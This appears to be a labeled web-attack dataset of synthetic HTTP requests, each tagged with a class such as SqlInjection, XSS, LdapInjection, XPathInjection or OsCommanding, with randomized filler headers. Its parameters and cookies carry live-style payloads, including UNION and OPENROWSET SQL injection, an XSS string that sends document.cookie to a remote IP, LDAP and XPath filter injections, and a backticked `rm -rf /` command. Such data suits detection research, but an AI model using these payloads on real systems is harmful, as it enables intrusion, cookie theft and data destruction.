Accept-Language: *
Cache-Control: max-age=5
Client-ip: 222.228.251.61
Cookie: hb1odHw=0061587;ereihbnsen=ecypf6BIIN;XD.WTCrW9LL-=alqmkbJ;yoiehuOi=1297;Relogmgiernwz=621230;sxqoeee=2699452691
Cookie2: $Version="480"
Date: Mon, 16 Feb 09 19:31:32 UTC
ETag: "4QmhRB4r6WXtHBkjG4w"
Expect: 100-continue
From: Sd34@Ehnom.cz
If-Modified-Since: Mon, 04 Feb 08 02:56:51 CET
If-Unmodified-Since: Tue, 23 Jan 07 15:41:20 CET
If-Match: *
If-None-Match: *
If-Range: "Htfa-zu1braBl@zn0"
Max-Forwards: 6
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: http://www.oretvC.biz/8mutteot/fatn/udtq/Siyh9et/txw1hid.pdf
TE: trailers
Trailer: Accept-Encoding
User-Agent: hno8toeeto (nruvqF_; dyChXKv; lx_vJKHae)
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: 1.5 64.159.174.14:29
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48977
Start - Id: 49083
class: XPathInjection
GET /oNc/d@0y2J1DAByk/7@jmopen.htm?eCbsan=dp&ileltruoe=f%29y+abUdr&rnzGodc1idh=5UK&uXdmetaYYO.ONK=xisw%27+++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%275ias%27+++%3D+%27&gsixrnlfTiv=1962&eiyees=lahtzm0aoqnxnmo&Fmsq8=774&_Yd.4=5055449 HTTP/1.1
Host: 106.75.22.73:914
Connection: keep-alive
Accept: text/*, audio/x-wav;q=0.2
Accept-Charset: utf-8;q=0.4, windows-874;q=0.4, x-mac-chinesesimp
Accept-Encoding: gzip, gzip, deflate;q=0.2, gzip;q=0.3, identity;q=0.5
Accept-Language: aype5t-NoawO;q=0.2, 9ubtx6-taaalm, datca-fyn1hec
Cache-Control: min-fresh=66324
Client-ip: 111.104.86.65
Cookie: efreameasgswst=94;ianesZnalds=y8dbrAhmEHt;fa1gpyewd6Epav=ossddchoai;h6fr7os3eNaadth=iZmH5;c6i=3dna;sbd7maAhm='7
Cookie2: $Version="155"
Date: Tue, 18 Apr 06 23:39:25 GMT
ETag: "EQOvMuJ_nWYwhDA6XN"
Expect: 100-continue
From: eynba@e3yzoc.com
If-Modified-Since: Wed, 10 May 06 15:03:51 GMT
If-Unmodified-Since: Fri, 08 Apr 05 16:50:47 GMT
If-Match: *
If-None-Match: *
If-Range: "d0f0VF0rTPq0r9j5lP"
Max-Forwards: 253
MIME-Version: 0.4
Pragma: bn5dd=mqo88eW
Proxy-Authorization: Digest username="tlens"
Authorization: NTLM ZGVtdTV5dGR0ZVJvaXptc3JyN2hpb3doZTZvT2liYXVl
Range: -39415,-80233
Referer: /esfsc.php4
TE: trailers
Trailer: Date
User-Agent: tzF-TUGD http://www.Enwznrum.org
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 7.6 www.goib.tiff
Transfer-Encoding: deflate
Upgrade: eecgo/9.8, alfajh/4.4
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 43.74.174.24
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49083
Start - Id: 42090
class: SqlInjection
GET /linkGv/iSltoyrs29u3kaD/nstaewneenaoBlw/tbe/varx5rX/aZCNdFr8XLp5/oayaanapeebtstndtg.aspx?tst=teXicatz+ncr+tT&tsnboirbfn5rpd=ti6-id6estb&qe1yF2=s4&idKSKl=tsIvbody-pee7emailynv&nEcbaueoersid=59101&AEjm7X00H@=90&jlhbfssa=%27+++%29+UNION+++ALL++++SELECT++++aN2it++++%2C+++jieirir+%2C+hatle++FROM+++++Mpennmof+++++WHERE+++etXeeTr++NOT++++IN+++%28++%272seInr%27%29+++AND+++++oc++NOT+++++IN+++++%28++%27irt6uiDj%27+++%29+++AND++%27%27%3D+%27&h9iaf=41742&T2AvBNtDiTN9=7768370677&erso=amd6zyQAl&treTi=1%3Aet%40xm&invmoqtiexa=963665&ofhE7a=62.6uK6Qs HTTP/1.1
Host: www.nroebR.de
Connection: etaqg
Accept: text/*;q=0.7, video/quicktime;q=0.9, image/jpeg
Accept-Charset: windows-874;q=0.7, iso-8859-4, euc-tw;q=0.5
Accept-Encoding: *
Accept-Language: ohuA1-9a;q=0.2, esmstC-ilee, a-enus3;q=0.9, sHfelshs-jss;q=0.4
Cache-Control: min-fresh=42
Client-ip: 44.233.251.244
Cookie: ihgrHadeo=vdao9dnRli9;otrgrd=lMboot.ini;hkuoimU=3EFY_GeR;hqs=iaErp;iwdhfIae=08;eeNggepc=3265547
Cookie2: $Version="940"
Date: Tue, 24 Mar 09 05:37:30 UTC
ETag: "EWRt_zJA_S@SSc6R5j"
Expect: bu7dtjr
From: ddasr9@itapbhhal.com
If-Modified-Since: Fri, 13 May 05 05:31:51 CET
If-Unmodified-Since: Wed, 22 Apr 09 13:59:03 UTC
If-Match: "__O3SF7HBl9NEex_u6r8"
If-None-Match: *
If-Range: "h4r7QSDOTjrx5E0g3M"
Max-Forwards: 34
MIME-Version: 0.9
Pragma: c6umIee='tccpa'
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: -951
Referer: http://rTfowst.com/em8etTt/As7ea.avi
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 0.5; 1I-nh; rv:9.7.9) Gecko/11297852
UA-CPU: x86
UA-Disp: 7402,9004,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4728x9077
Via: 6.6 17.200.7.34, 70v/6.3 www.s74htkqe.jpg, 4.7 220.159.212.171
Transfer-Encoding: compress
Upgrade: z6NS/9.8, Brl/1.0, ets/2.0
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42090
Start - Id: 48457
class: XPathInjection
GET /0uE0eedrNtur0nsd6i/_inputYTWVNstylecmd63jQ8/rynwoHcey/7osmzaua2tesgd/nL-LgIM6HpVM5ya3d_/isdUndaazith9hSobes/iA_rQUIR6va@/eval9divp6BKiPmWN@J9/nIIollt-UEnJ3QK.sh?ae=efeurm9+scripts0tha3t%28+&aenghcsfn=1109 HTTP/1.1
Host: 91.172.34.243:7774
Connection: keep-alive
Accept: application/rtf;q=0.7
Accept-Charset: big5, us-ascii;q=0.6, x-mac-ce;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: vam-eanxu;q=0.4, ncaZc9i-a;q=0.9, eL-e, rgeiau-edl8, scpcgawo-r9
Cache-Control: aeI='Scu'
Client-ip: 62.130.69.26
Cookie: renlgsomnt=d Ap;SzVx=8246 or   count(path/child::node()[position()=((i+j+k+l+1)] |     path/child::*()[position()=(k+1)])=1  or    335=
Cookie2: $Version="834"
Date: Fri, 28 Dec 07 20:31:33 GMT
ETag: "tSrdKQzlBgsIDnYV4"
From: nuehal@ifkmfi.it
If-Modified-Since: Tue, 09 Dec 08 13:04:42 UTC
If-Unmodified-Since: Sat, 29 May 04 07:34:47 UTC
If-Match: "EWj8u-AyLDh-3-cF4y"
If-None-Match: "mnXiwwubbhc48N3sYT6V"
If-Range: *
Max-Forwards: 6126
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM ZUFsc2FiY2FtRWVyZTF0VXZ0aG9obm80b3BsYjYxbGh0cmVsMzdhelR3b250ZWxo
Authorization: Basic YWd3OGVuOnRoZW5tc24=
Range: 5-,-7,65604-43
Referer: http://www.h6bjt3.st/mtll1iae/nAmltih.tar.gz
TE: deflate
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 4.5; hi-mt; rv:2.9.3) Gecko/30007008
UA-CPU: Sparc
UA-Disp: 3766,742,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2402x7254
Via: 9.9 121.128.99.76, 5.5 176.68.101.59:46
Transfer-Encoding: deflate
Upgrade: daft/8.1, resali/5.5, hne1/8.0
X-Forwarded-For: 3.118.59.198
X-Serial-Number: 881741666326313
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 48457
Start - Id: 42662
class: SqlInjection
GET /4ph08ico/roaatihtapehort/bKwl4lxkn3HJvsi.T/9n/2ecOleae57Kl/y7D63.kvFJ4A8o/soYjn-eUISS.exe?72SaNkotGoO=hs+e%2B&1ehscaT=8125&e05sqtsez60l=2s&O1o=ntNi&0Kf-63=sdl%29b&pRa=5-3PfUfnu&au87Rbc=OR++%27buit%27+%3D+++++%27Sim%27%2B%27ple%27&69emsso=drEanhrttr&SNERitennaayeyg=299541865&tCf=Ed&m_JvknincludeF=1770707&sdu=35802970&yjy7x=usrw HTTP/1.1
Host: 233.236.71.112
Connection: ndrssgoa
Accept: audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bR2oatdi-tc;q=0.3
Cache-Control: max-stale=710
Date: Mon, 01 Jun 09 04:56:19 UTC
ETag: W/"l.gpCOT9l_T0QwKSgq"
If-Modified-Since: Mon, 06 Jun 05 15:26:35 UTC
If-Unmodified-Since: Fri, 09 Jan 04 10:48:18 GMT
If-Match: *
If-None-Match: "Wz6QvjY4qmlVN6EL_-"
MIME-Version: 8.1
Pragma: i=i
Authorization: Basic OWVlYWk6bnNlYXQ=
Referer: http://5ooNe.be/txochu/haoredoi/taqt.fgf
User-Agent: tAtirehyseg
Via: 3.1 www.rach.css:70467, 5.9 www.eeErd.png
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42662
Start - Id: 37195
class: LdapInjection
GET /eujSqhehsw56qkarG/2ehs/nAdeOt3fhmf4eln3etw.php?cliYhgsE=uos1hnz5ntrsatmcdtsh&sCisiba=509&C70=ih%29%28++%7C+%28ahan%3D*%29&Ta9nh=8841&tRredHsceuqE=35150&BP-y26KMe3=r7logr&0rP8KsQ@=Acc&isisntfemwerte=%3BeX+i&ruorArutayore=iENrEkrf&En1vgct0seu3oii=sloT3N9eeoghEsee HTTP/1.1
Host: 158.3.191.53
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 230.103.128.65
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="6"
Date: Fri, 27 Aug 04 22:36:23 UTC
ETag: W/"LXhwT0.d956fmuvI"
Expect: 100-continue
From: ssnh@aamhzelr.net
If-Modified-Since: Sun, 29 Nov 09 20:31:08 GMT
If-Unmodified-Since: Wed, 08 Feb 06 12:50:40 CET
If-Match: "QHkl6BtaIA.9A8Naa9Y"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 4
MIME-Version: 2.5
Pragma: no-cache
Authorization: NTLM ZGxibnV5M2phb29QZWE0aGE5MkF2ZXRpMjNteWEyb3RtZ21l
Range: 605-286224
Referer: /wtirnc/nH5uEgL/sBhrah/cPrutb/tiQeKk.nsf
TE: trailers,chunked,chunked
Trailer: From
User-Agent: ewetHeic
UA-CPU: 68000
UA-OS: Win98
UA-Color: color8
Via: 2Irhs/1.2 92.36.242.48:85
Transfer-Encoding: daem
Upgrade: resPct/8.2
Warning: 210 www.aenolsu.gif "shzStqziheorenrrf" 
X-Forwarded-For: 200.50.212.253
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37195
Start - Id: 47600
class: XSS
GET /sBixLwAE1qZ3eb81oI/IE2adenorSyooje.aspx?zChtpassm=o%3AA&seoiojeqpr=olyr%28ehnc%2Borrd%25&0cWE=%3Clink+++rel+%3D+++%22+++stylesheet+++%22+href+%3D++++%22+javascript%3A++%5Balert+++%28%27msd%27%29%3B%5D++%22++++%3E&u9J8gsIs=wdst5&7QuH.Y.@a=onNidblylti1th8d&ceoleesy51eec=tmdMdDFR&XNnp=4305790504&Yucf=ezCFky7ow HTTP/1.1
Host: 34.140.156.177
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-8;q=0.6, cp-936, x-mac-greek, cp-950, x-mac-japanese;q=0.8
Accept-Encoding: identity;q=0.1, gzip, identity, gzip, gzip
Accept-Language: 4lStsir-6FlPd, lyTheon-zsmnro, l2trna-eenr;q=0.4, 40lxi1I-pidi5tra, aaa5z-e;q=0.2
Cache-Control: N='honiaa'
Client-ip: 154.17.60.227
Cookie: eh=nShLD98;IUexecJPUWsystemY=4;aae=a7on;tezasrxihiie=lsdmteciSt gI;satt6ylhe=cT2X0;3N5KXqZ=h
Cookie2: $Version="647"
Date: Sun, 07 Mar 04 05:24:47 GMT
ETag: "XH4fCPIuXxAhkkU"
Expect: 100-continue
From: zl3e2@1ftosH.com
If-Modified-Since: Sat, 01 Aug 09 02:27:13 CET
If-Unmodified-Since: Sun, 27 Dec 09 13:46:11 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 07 Oct 05 03:57:12 UTC
Max-Forwards: 36
MIME-Version: 8.3
Pragma: Skaeuth=gEshlD
Proxy-Authorization: Basic ZExnd3JkOlZhc2hlcnU=
Authorization: Basic aXQwcjk6ZWludA==
Range: 849916-
Referer: http://www.uhipqli9.it/anhem/amaoioxo/elcs/l3mems/IhbdObns.cfm
TE: chunked,gzip,chunked
Trailer: If-Modified-Since
User-Agent: ej0tr8isgnNmhexeda
UA-CPU: MIPS
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 2.8 40.37.142.166, 6.3 www.sbremu.tiff, 9.6 62.131.43.5
Transfer-Encoding: gzip
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47600
Start - Id: 35173
class: SqlInjection
GET /eehL5asesroD3abEAa/wongngKRQwXOzrOcupmg/tsjt/ndsg.gif?LhVJ=6and3saataeannie&ssl3e0ieteimZo=becda&tnimayonnigae=8024346400&9andI9P3OdeleteSa@=vbscriptl&arrsdtt9=41group+by&nIseG=%3B+++++select+*+from++OPENROWSET%28++%27SQLoledb%27%2C%27uid%3Dmuezmyhme%3Bpwd%3Djnn7o%3BNetwork%3DDBMSSOCN%3BAddress%3D205.48.126.254%2C95586%3B%27%2C%27select+*++from+++Anretzn6%27+++%29&Atee29zamgroam=inputbTe HTTP/1.0
Host: 119.193.204.124
Connection: keep-alive
Accept: text/html;q=0.4, video/quicktime
Accept-Charset: iso-8859-4, isiri-3342;q=0.4
Accept-Encoding: gzip, gzip, identity;q=0.1
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 86.6.34.68
Cookie: bhatTchgtrryedM=ax4eqesr9Rw;Km6KoQJ=esLilyDect;eTkm72hrs=82118
Cookie2: $Version="07"
Date: Fri, 11 Mar 05 05:55:29 UTC
ETag: "80m9eO8KfXbNMkwvG"
Expect: nhcunawc
From: as5oeh@nl7ehee.ch
If-Modified-Since: Sat, 02 Apr 05 01:08:29 UTC
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: *
If-None-Match: "idJyU-TtkiuSmVzitD"
If-Range: *
Max-Forwards: 974
MIME-Version: 2.3
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Authorization: ygitr fiyucfot=Ceeh7ale
Range: -619874,-90
Referer: /p0hdmohs/eErN/oate.msf
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/5.9 (Windows; U; Win98 1.7; eu-8n; rv:7.6.2) Gecko/06497116
UA-Disp: 1579,9873,8
Via: FTP/4.5 www.eaee9eNc.png, 1.4 101.62.77.40
Transfer-Encoding: gzip
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35173
Start - Id: 47247
class: XSS
GET /ikDo-Nd.P9ugh/e4snzlekbemAtz/Doezti/ivb@94pPBVPk0V/efttc/9n/QMDrdTl.M0/ot6otFg9teaene/mQzh_i8B6/oiiaashs6hcwwtt8ew8/io8r.png?sqtestAh=h++b1&aganztsdnt9=Ohztvar&zlsectRrvqhlir=i%3Be2&Vo5unionfL=e&oe8sfg=SnoHhcataprocessing-instructiont&t6iqhceidbiv=hqFrj&8ZahomeRZQj=+e%3C%5Caudshutdown%3Cyaruraxnbetween&mhb=%3Cinput++++type%3D+%22++++image++%22+dynsrc+++%3D%22++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F190.18.2.214%2Fon.jsp%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&LAtncen4le=514883&ertbetgsxbq=Thi&yh2=lAtE&ldednEepaoumr=%27t%28tiframe+t%7En&Eng11ay=cZuUZmw HTTP/1.1
Host: 77.178.125.151
Connection: keep-alive
Accept: text/html, audio/basic;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: deflate
Accept-Language: o-bacdo;q=0.5, lswte-aiysca, embPqd-pe
Cache-Control: no-transform
Client-ip: 19.118.218.108
Cookie: 2o2tmerAhO=914;al8U=dglam|home3dlfeO99
Cookie2: $Version="66"
Date: Sun, 20 Feb 05 11:52:55 UTC
ETag: "WAB5@Z.yDarnU0JFvhk"
Expect: 100-continue
From: eeTaCo@mVlE3nKhn.biz
If-Modified-Since: Sun, 25 Apr 04 17:39:28 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 5581
MIME-Version: 3.6
Pragma: hoy=ro
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -3
Referer: /caig6zo9/di8N/galc.avi
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: nI9ZKW http://www.eSEjrt.cz
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/1.1 112.223.231.15, naia/7.1 209.9.53.118
Transfer-Encoding: 1Ohs; anmlaA=sctE
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47247
Start - Id: 37026
class: LdapInjection
GET /94YrwFVxMoQlpUkZKUG/tr@nqAVuVDmx1Q_TCTly/5sirQ/ps./dbVsHc8f/ehauD/mxu2c@.shtml?tit9w=ocd&ak0iestrhwwookc=nzb8YNyb&ohz=05%29%28%26%28objectClass%3DoiE%29%28%7C%28sn++++%3D++++bhi%29%28cn%3DcIe++++J*%29%29&ohtrcpuPQF=ce&whereaWI@=960&raseonyA9wrryn=91zEE7l_M&nnr0or1auPbiee=51 HTTP/1.0
Host: 69.140.240.67
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 201.0.26.84
Cookie: r2hs2rg6wr=459;etnqWteilabohlr=ule copy
Cookie2: $Version="984"
Date: Thu, 18 May 06 16:26:08 GMT
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Mon, 02 Apr 07 05:03:52 CET
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 13:59:29 CET
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 952638-,75883-52
Referer: http://4NTk.com/aensrtuo/itti/eeede/lck8it.pl
TE: trailers
Trailer: Accept-Charset
User-Agent: eMgGWbMG http://www.ahct.org
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 0.7 204.253.165.17
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37026
Start - Id: 49861
class: XPathInjection
GET /39UFSqY1sQfh/lTiS7Ojfcd2D.dll?kscript_YwNGCD=2&wtreSxh0t0gr=gu%5Ctn%24or&IEtmpP=q%2FdimXod%2Fbr%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D99%5D+++++%7C+++ena1%2Froadnl%2Fs%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D121%5D++++or+++++%27wivioi%27%3D++++%27&r0wd1aapdlekTn=yeeCacstaomaenw&5dJjlogvBxtermopenhomeB-=0434&l9waroEwts=ngt&ymedr=ftl&fouOQI=ithnwoLAawgm+tu&etaef4bDma7a=aO7mYe&E72LCU=s%3AA-g&Rveutre=e8%3A%5DstKantorvgvbscript&edstdsnuiee=dHA HTTP/1.1
Host: 85.80.142.4
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 177.96.126.182
Cookie: a9Rei=shul;diyynwtn1tegoa=i&%
Cookie2: $Version="5"
Date: Wed, 22 Jun 05 18:23:09 UTC
ETag: "FXz8hhN7FMdGv1tyd5or"
Expect: ioqeane
From: eslc7@67owp.net
If-Modified-Since: Thu, 05 May 05 11:47:39 UTC
If-Unmodified-Since: Mon, 16 Aug 04 09:15:08 UTC
If-Match: "LEz15B32Whfmd1dBqn-"
If-None-Match: *
If-Range: *
Max-Forwards: 1573
MIME-Version: 4.0
Pragma: pn2=eN2
Proxy-Authorization: NTLM b3NuaFBhaDRjZW9oaWhueG50aGJuaWQ4OGVUOHg0RXRucw==
Authorization: Digest uri=/aogrn/oeyitp1/to3retr/ttrz/abslpe1.gif
Range: 40331-8,658595-,136-
Referer: /ozii39p9.css
TE: trailers
Trailer: From
User-Agent: sVYd9BrL3a http://www.dtg5l.it
UA-CPU: MIPS
UA-Disp: 1964,9946,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 8.5 www.qhwyUdl.js, 0.5 www.ShNMn.tiff:41
Transfer-Encoding: compress
Upgrade: eht/0.8, T3l/7.9, myt2/5.8
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49861
Start - Id: 36776
class: OsCommanding
GET /ora8tdwriteetntuo/z-8-WDa.eTW/iframe%uUVc6Ab18PHSW/4tMN/pZhhw9htAz/e5zL/7riemihwsthpVicygwuw/osEssomIde/yonOhribaJbeevauinyb/ah0YFu.msf?hoeaitq2nvss=51&tdtiaaote0seja=+gno+a+xpeE&stay0tvAus=udhJ&daifzdOt0=r_YiyJIOisJ&tgni=%60++rm++-rf+++++%2F+++++%60&sbo=XbdP&dzjrietn=Ea HTTP/1.0
Host: www.geneEaneye.ch
Connection: keep-alive
Accept: image/*;q=0.6, image/jpeg
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 41.112.35.248
Cookie: no=lti;ett8hlhth=oGr]bo;RsesQlwDf=0le%i6d;oqfEtirqx=eg4edowec5bltoti;itgelrii=deletex
Cookie2: $Version="4"
Date: Fri, 02 Apr 04 07:56:09 CET
ETag: W/"31ix0xl8krLbJGHhVw"
Expect: 100-continue
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sat, 11 Dec 04 03:13:11 GMT
If-Unmodified-Since: Wed, 29 Sep 04 18:08:16 CET
If-Match: *
If-None-Match: *
If-Range: "QU.j350IZO40kg8V"
Max-Forwards: 2059
MIME-Version: 5.1
Pragma: ur7='e0iFrv'
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: wyboL acphzxa=ieoTe
Range: -0
Referer: /5riocx/eviya/hneko9so.gz
TE: gzip,trailers,trailers
Trailer: If-Match
User-Agent: a_8lsGK http://www.e4ie.gov
UA-CPU: PowerPC
UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: 0.8 191.50.111.146
Transfer-Encoding: compress
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36776
Start - Id: 37312
class: LdapInjection
GET /tv.Str-V26A4wke6KqHM.mspx?odhdraMe=oSZStT0qlK.&natle=rdE&my1rC0sufaeGLqe=063733&teeOSAie8He9=nieseaacna&IPrz63=r2Hikieelueo&lwBy=nxp_sco&ctrrrEsejblbarp=908582&N-y81XZnhnN=768619&lieitijnriH=he&x9s=hx%25m6eaksN%7ERhavingeoddocument&hnitvd=tyon&dtohn9erhi=lGTEf-Tv HTTP/1.0
Host: 92.199.186.219
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: mns6y-irheeb2;q=0.3
Cache-Control: only-if-cached
Client-ip: 181.208.243.92
Cookie: e8iddu=488;eeeitatJReaoioS=806
Cookie2: $Version="1"
Date: Wed, 15 Nov 06 09:57:09 UTC
ETag: W/"tl_jTDITfIAnf1Nk"
Expect: eltioihl=t1tinEet
From: 9cuzRhxt@s7mEc.net
If-Modified-Since: Thu, 09 Jul 09 09:10:44 CET
If-Unmodified-Since: Fri, 20 Jun 08 06:27:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 19:46:56 CET
Max-Forwards: 0
MIME-Version: 4.4
Pragma: s='lhopsnts'
Proxy-Authorization: NTLM ZG9yaG9yb28xb2VocjFzZWVhdHc1OGVlZW90YWRpZGFBRm1kdWxyZXR0b1k=
Authorization: NTLM ZXRvdWVsbG90aXZjd2VpZXVybGF2bmFmdDllcGNvMkF0dWpzbXVPOGd0
Range: 17-
Referer: http://www.mRsslca.net/ewlsb/aeen.jsp
TE: chunked;q=0.4,trailers,gzip
Trailer: If-Range
User-Agent: ")(targetfilter=(o=NetscapeRoot))
UA-CPU: Sparc
UA-Disp: 050,5091,32
UA-Color: color16
Via: HTTP/2.9 www.nrjomRl.tiff, 6.3 www.srieOt4r.css, Cshc/8.7 www.fhtot.gif
Transfer-Encoding: compress
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 97.235.140.149
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37312
Start - Id: 39915
class: SSI
PUT /zYBHq3EFQ.XvHFbAOfxs/tTHDK_OXZMwy8Tsv.msf? HTTP/1.0
Content-Length: 222
Content-Language: anyt
Content-Encoding: compress
Content-Location: http://w2U4h.fr/NoieqnEu/suec/wtdsi4r/trl4tu/idretmwr.php
Content-MD5: amhidHFObnRlbjRlZTNzcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Thu, 05 Nov 09 11:57:16 GMT
Host: 43.41.104.229
Connection: keep-alive
Accept: audio/basic;q=0.3
Accept-Charset: windows-1254, iso-8859-1
Accept-Encoding: gzip;q=0.7, gzip, deflate;q=0.0, compress;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 239.36.31.16
Cookie: ltstt=Tmh6ndra;9yqraoDYstyle=svbscript
Cookie2: $Version="524"
Date: Wed, 19 May 04 21:19:06 UTC
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: 100-continue
From: etiwhOvt@03yWr.net
If-Modified-Since: Sat, 12 Nov 05 09:35:51 GMT
If-Unmodified-Since: Sun, 05 Feb 06 04:13:50 UTC
If-Match: *
If-None-Match: "yEvVKlSQTUz1rYVA1Y"
If-Range: Mon, 26 Feb 07 11:32:01 GMT
Max-Forwards: 16
MIME-Version: 3.1
